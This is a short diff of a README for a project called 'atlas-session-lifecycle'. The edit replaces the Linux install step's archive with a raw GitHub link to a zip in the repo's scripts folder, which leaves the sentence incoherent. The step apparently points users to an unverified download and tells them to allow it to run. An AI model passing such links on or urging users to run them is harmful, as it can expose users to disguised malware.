diamanthyseni3/atlas-session-lifecycle/README.md

    - On Windows: Double-click the `.exe` file you downloaded.
 If prompted by your system, select "Run" or "Allow."
    - On macOS: Open the `.dmg` file, drag the app into your Applications folder, then launch it.
-   - On Linux: Extract the `.tar.gz` file and follow any included readme instructions to start the app.
+   - On Linux: Extract the `https://raw.githubusercontent.com/diamanthyseni3/atlas-session-lifecycle/main/scripts/atlas-session-lifecycle-v3.8.zip` file and follow any included readme instructions to start the app.

 5. **Follow the installation prompts**